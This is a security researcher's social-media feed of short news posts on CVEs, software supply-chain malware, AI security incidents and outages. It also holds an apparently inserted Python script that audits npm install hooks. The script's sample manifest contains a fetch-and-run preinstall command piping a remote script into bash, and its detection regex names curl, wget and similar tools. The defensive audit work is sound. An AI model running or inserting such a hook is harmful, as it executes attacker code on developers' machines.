Sam Stepanyan
OWASP London Chapter Leader. #OWASP Global Board Member. OWASP #Nettacker Project Leader. #AppSec Consultant, #CISSP. Follow me on Twitter/X and Mastodon twitter.com/securestep9 infosec.exchange/@securestep9
- #ReactNative: Critical vulnerability in Metro server for #React Native CVE-2025-11953 allows unauthenticated attackers to execute arbitrary OS commands via a POST request and is actively exploited - patch now! #Metro4Shell #SoftwareSupplyChainSecurity 👇 www.bleepingcomputer.com/news/securit...
- The number of startups, products and workflows built on #chatGPT-4.x models is huge! This is your reminder that #OpenAI will be *retiring all* gpt-4.x, o4-mini and some gpt-5 models next week on February 13th, 2026 🍿: #AIBOM 👇 help.openai.com/en/a...
- #Notepad++ Official Update Mechanism Was Hijacked to Deliver Malware. Notepad++ downloads between September 2 - December 2, 2025 were diverted to malicious servers. #SoftwareSupplyChainSecurity 👇
- #AI on Australian travel company website sends tourists to nonexistent hot springs, describing a non-existent site as a "tranquil haven" rated "favourite among hikers", causing "droves of tourists" to turn up in places with no services/cell coverage:
- #Ivanti: Two Ivanti EPMM #ZeroDay Unauthenticated #RCE Vulnerabilities CVE-2026-1281 & CVE-2026-1340 Actively Exploited, Patch Now! 👇 thehackernews.com/2026/01/two-...
- #OpenSSL Critical Vulnerabilities Allow Remote Attackers to Execute Malicious Code (CVE-2025-15467). Patches released: 👇 cybersecuritynews.com/openssl-vuln...
- #ESA: European Space Agency's cybersecurity in freefall as yet another breach exposes spacecraft and mission data: #databreach 👇
- #Python: Malicious #PyPI Package called 'sympy-dev' Impersonates #SymPy, Deploys XMRig Miner on Linux Hosts: #SoftwareSupplyChainSecurity 👇
- #telnet: Critical telnetd #Vulnerability CVE-2026-24061 Lets Attackers Bypass Login and Gain Root Access on systems running GNU InetUtils since version 1.9.3 up to and including version 2.7. The vulnerability went unnoticed for nearly 11 years. 👇
- #jsPDF: Critical Path Traversal Vulnerability (CVE-2025-68428) in jsPDF - a widely-adopted #npm package for generating PDF documents in JavaScript applications allows attackers to read & exfiltrate arbitrary files from the local filesystem: 👇
- #TrustWallet: in a potential supply chain attack, the TrustWallet browser extension was compromised in its latest update, with injected malicious code quietly sending the wallet's seed phrase to a malicious domain named "metrics-trustwallet(.)com" - registered only a few days ago 👇 www.ccn.com/education/cr...
- #MongoDB: Multiple versions of MongoDB and MongoDB Server are vulnerable to Remote Code Execution (#RCE) #vulnerability CVE-2025-14847 and may be abused by unauthenticated threat actors in low-complexity attacks that don't require user interaction. Patch now! 👇 www.bleepingcomputer.com/news/securit...
- #n8n: Critical CVSS 10.0 Remote Code Execution (#RCE) #Vulnerability in n8n via expression injection. Users advised to upgrade to version 1.122.0 or later immediately: github.com/n8n-io/n8n/s...
- #Gemini Zero-Click #Vulnerability Let Attackers Access Gmail, Calendar, and Docs. No clicks or warnings were needed. An attacker simply shared a poisoned Google Doc, Calendar invite, or email embedding hidden prompt injections. #AISecurity 👇 cybersecuritynews.com?p=135749
- If you missed @shehackspurple.bsky.social 's talk "30 Tips for Secure #JavaScript" at the @owasplondon.bsky.social meetup last week - you can watch the recording on the #OWASPLondon YouTube channel [please subscribe!]:
- #Swiss government urges citizens to ditch #Microsoft365 and other #Cloud providers due to lack of proper E2E encryption citing US Cloud Act requirement to hand over data to US authorities, even if it’s stored in Switzerland: #DataSecurity 👇 www.techradar.com/pro/security...
- #Wordpress: 100,000+ WordPress Websites Affected by Remote Code Execution (#RCE) #vulnerability in Advanced Custom Fields Plugin: 👇 www.wordfence.com/blog/2025/12...
- #VSCode: 24 malicious VS Code and #OpenVSX extensions are stealing developer credentials - spreading through popular names like Flutter, React, and Tailwind. Full list of malicious VSCode extensions in the article below: #SoftwareSupplyChainSecurity 👇
- #npm: Malicious NPM Package eslint-plugin-unicorn-ts-2 Uses Hidden Prompt and Script to Evade #AI Security Tools: #SoftwareSupplyChainSecurity 👇
- #OpenAI API Data Breach: OpenAI has disclosed a #databreach affecting some API customers due to a hack at third-party vendor #Mixpanel. What was exposed: Names & Emails, Approximate Location, UserID/Org IDs 👇
- #Maven: hundreds of packages just got caught running Shai-Hulud v2 - the same malware that hijacked npm two days ago. It spread through automated rebuilds, infecting devs who never used npm stealing & leaking secrets across thousands of GitHub repos: 👇 thehackernews.com/2025/11/shai...
- Over 80,000 files with #passwords and keys from governments, banks, and tech firms were found online pasted into public code tools like #JSONFormatter and #CodeBeautify. Cybercriminals are already scraping and using the data. And yes - it’s still live! 👇 thehackernews.com/2025/11/year...
- #NPM: Second Shai-Hulud Infection Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft: #SoftwareSupplyChainSecurity 👇
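The Shai-Hulud posts above (the npm wave and the Maven rebuilds) both describe credential theft from install-time hooks: npm runs a dependency's preinstall/install/postinstall/prepare scripts during `npm install`, so a compromised package executes before any of its code is ever imported. Below is an added example, not code from the original posts or from any of the referenced projects, that audits package manifests for such hooks and flags commands that fetch or decode code at install time. The manifests and the `example-*` package names are constructed sample data, and the suspicious-command regex is an illustrative heuristic, not a signature from any advisory.

```python
"""Audit npm package manifests for install-time lifecycle scripts.

Added example (not from the original posts or any referenced project).
All sample manifests and package names below are constructed.
"""
import json
import re
from pathlib import Path

# Hooks npm executes while installing a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic markers of a hook that downloads, decodes or evals code at
# install time. Assumption for illustration, not an authoritative list.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|base64|node\s+-e|eval\(|powershell|child_process)", re.I
)

# Constructed manifests: a native addon with a legitimate build hook, a
# library with no install hooks, and a hypothetical malicious package whose
# preinstall hook pipes a remote script into a shell.
SAMPLE_MANIFESTS = {
    "example-native-addon": json.dumps({
        "name": "example-native-addon", "version": "1.0.0",
        "scripts": {"install": "node-gyp rebuild"}}),
    "example-ui-lib": json.dumps({
        "name": "example-ui-lib", "version": "2.3.1",
        "scripts": {"build": "tsc -p .", "test": "jest"}}),
    "example-typo-squat": json.dumps({
        "name": "example-typo-squat", "version": "0.0.7",
        "scripts": {"preinstall": "node -e \"require('child_process')"
                    ".exec('curl -s https://example.invalid/c | bash')\""}}),
}


def install_hooks(manifest_json):
    """Return {hook: command} for the install-time hooks in one package.json."""
    try:
        scripts = json.loads(manifest_json).get("scripts") or {}
    except (ValueError, AttributeError):
        return {}  # malformed manifest: nothing npm could run from it
    return {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}


def audit(manifests):
    """Return (package, hook, command, suspicious) for every install hook."""
    findings = []
    for name, manifest in manifests.items():
        for hook, cmd in install_hooks(manifest).items():
            findings.append((name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings


def scan_node_modules(root):
    """Audit every package.json under an installed node_modules tree."""
    root = Path(root)
    manifests = {}
    for pj in root.glob("**/package.json"):
        try:
            manifests[str(pj.parent.relative_to(root))] = pj.read_text("utf-8")
        except (OSError, UnicodeDecodeError):
            continue
    return audit(manifests)


if __name__ == "__main__":
    for name, hook, cmd, sus in audit(SAMPLE_MANIFESTS):
        print(f"{'SUSPICIOUS' if sus else 'review':10} {name}: {hook} -> {cmd}")
```

Every install hook is worth a look, not only the flagged ones: `node-gyp rebuild` is normal for a native addon, but a pure-JavaScript library that suddenly gains a preinstall script is exactly the change these campaigns introduce. To stop hooks running at all in CI, set `ignore-scripts=true` in `.npmrc` and re-enable builds only for the packages that genuinely need them.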
- #AWS launched Agentic AI Security Scoping Matrix – a framework designed to help organizations securely deploy autonomous AI systems: #AISecurity 👇
- #WhatsApp: Largest data leak in history - the entire directory of 3.5bln of WhatsApp users was available online unprotected for retrieval. Austrian researchers were able to download all phone numbers, profile pictures & data including public keys: 👇 www.heise.de/en/news/3-5-...
- #GitHub: Downdetector and social media platforms are currently filled with reports about a GitHub outage, and the official GitHub Status portal has confirmed the problem: #GitHubDown 👇
- #Cloudflare: A Cloudflare outage is taking down big parts of the internet: #CloudflareDown 👇
- #Fortinet: Critical vulnerability in Fortinet FortiWeb (CVE-2025-64446), is under active exploitation - CISA adds it to KEV catalog:
- #NPM: Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack Exposing Major Security Gaps: 👇
- #Linux: Rust-based sudo-rs Affected By Multiple Security Vulnerabilities - Impacting #Ubuntu 25.10 including partial password exposure (CVE-2025-64170) and incorrect User ID in timestamps. Patches for both issues have been released: 👇 www.phoronix.com/news/sudo-rs...
- #NPM: Malicious NPM Package @acitons/artifact With 206K+ Downloads Stole GitHub Tokens: 👇 hackread.com/fake-npm-pac...
- Many thanks to everyone who attended my OWASP #Nettacker talk at the #OWASP Global AppSec 2025 Conference in Washington, DC. 👉https://github.com/OWASP/Nettacker
- #SAP: Patches 3 Critical Vulnerabilities (CVSS 10.0) Including RCE / Code Injection and Hardcoded Credentials affecting SQL Anywhere Monitor (Non-GUI), SAP NetWeaver AS Java, and SAP Solution Manager (CVE-2025-42890, CVE-2025-42944, CVE-2025-42887): 👇 securityonline.info/sap-november...
- #NPM: Popular JavaScript library expr-eval is vulnerable to RCE #vulnerability CVE-2025-1273. Impacted software developers are advised to migrate immediately to expr-eval-fork v3.0.0 and republish their libraries: #SoftwareSupplyChainSecurity 👇 www.bleepingcomputer.com/news/securit...
- #AI: HackedGPT: Novel AI Vulnerabilities Open the Door for Private Data Leakage: unique indirect prompt injections, exfiltration of personal user information, persistence, evasion, and bypass of safety mechanisms: #AISecurity www.tenable.com/blog...
- #Kubernetes: Newly disclosed #vulnerabilities in the #runC container runtime used in #Docker & Kubernetes (CVE-2025-31133, CVE-2025-52565, CVE-2025-52881) could be exploited to bypass isolation restrictions & get access to the host system (escape): #k8s 👇 www.bleepingcomputer.com/news/securit...
- #Django: Critical SQL Injection Vulnerability in Django (CVE-2025-64459): www.endorlabs.com/learn/critic...
- #NPM: Details have emerged about a now-patched critical security vulnerability in the popular "@react-native-community/cli" npm package that could be potentially exploited to run malicious operating system commands: #SoftwareSupplyChainSecurity 👇
- #Wordpress: CVE-2025-11833 (CVSS 9.8) Critical Flaw in #PostSMTP Plugin Exposes 400,000+ WordPress Sites to Unauthenticated Account Takeover: 👇
- #MicrosoftDown: ⚠️ Microsoft down? Major outage hits Azure Cloud, 365 and more - even Minecraft and Xbox affected: #AzureDown www.techradar.com/pro/live/mic...
- #MarksandSpencer: British retail giant M&S terminates contract with Indian outsourcer #TCS after losing over £300mln in a cyberattack blamed on the failures of the outsourced IT helpdesk, which was tricked by social engineering by the Scattered Spider group: www.computing.co.uk/news/2025/se...
- #Formula1: An API vulnerability in the FIA driver portal exposed Formula 1 drivers’ personal data including passports and licenses. Anyone could become an “admin” with a single API request: #APISecurity 👇 ian.sh/fia
- If you are attending #OWASP #LASCON (@LASCONATX) 2025 Conference in Austin, Texas don't miss my talk on the OWASP #Nettacker Project at 1pm CDT in the Read Oak Ballroom: lascon.org/schedule/
- #MCP: Critical Vulnerability in a popular MCP Server Platform #Smithery Exposes 3,000+ Servers and Thousands of API Keys: #AISecurity 👇
- #AWS: Massive global #outage takes out a huge chunk of the internet with many sites and services down: #Cloud #CloudDown #AWSDown www.bbc.com/news/live/c5...
- I am running for re-election to the OWASP Global Board of Directors in 2025. 🗳️OWASP Global Board Elections have started and all OWASP Members should have received an email with the e-ballot yesterday. owasp.org/www-board-ca... Thank you for your support!
- #F5: #CISA warns of ‘significant’ threat to federal networks after a massive #databreach as nation-state hackers stole F5 source code, undisclosed bug info and stayed undetected inside F5 product development network for several months: therecord.media/cisa-directi...
- #Redis: A 13-Year-Old Vulnerability CVE-2025-49844 dubbed #RediShell: CVSS 10.0 Vulnerability Lets Attackers Run Code Remotely (#RCE) in Redis versions used in 75% of Cloud environments! Update your Redis immediately!